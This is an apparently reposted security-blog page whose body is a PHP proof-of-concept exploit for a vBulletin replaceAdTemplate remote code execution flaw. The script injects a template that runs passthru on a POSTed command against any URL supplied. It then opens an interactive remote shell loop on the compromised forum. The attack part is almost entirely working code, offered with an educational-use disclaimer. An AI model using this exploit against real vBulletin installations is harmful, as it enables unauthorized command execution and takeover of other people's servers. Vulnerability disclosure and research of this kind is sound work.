Latest Tech

Latest Posts

vBulletin replaceAdTemplate Remote Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 352
vBulletin replaceAdTemplate Remote Code Execution
vBulletin replaceAdTemplate Remote Code Execution
<?php

/*
-----------------------------------------------------------------
vBulletin (replaceAdTemplate) <?php

/*
-----------------------------------------------------------------
vBulletin (replaceAdTemplate) Remote Code Execution Vulnerability
-----------------------------------------------------------------

author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://invisioncommunity.com

+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+

[-] Technical Writeup:

https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "\n+---------------------------------------------------------------------+";
print "\n| vBulletin (replaceAdTemplate) Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 2)
{
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/vb/";
print "\nExample....: php $argv[0] https://vbulletin.com/\n\n";
die();
}

$params = [
"routestring" => "ajax/api/ad/replaceAdTemplate",
"styleid" => "1",
"location" => "rce",
"template" => "<vb:if condition='\"passthru\"(\$_POST[\"cmd\"])'></vb:if>"
];

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

if (curl_exec($ch) !== "null") die("\n[-] Exploit failed, unable to create template!\n\n");

$params = ["routestring" => "ajax/render/ad_rce"];

while (1)
{
print "\nvBulletin-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$params["cmd"] = $cmd;
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
preg_match('/(.+)\{"template":/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.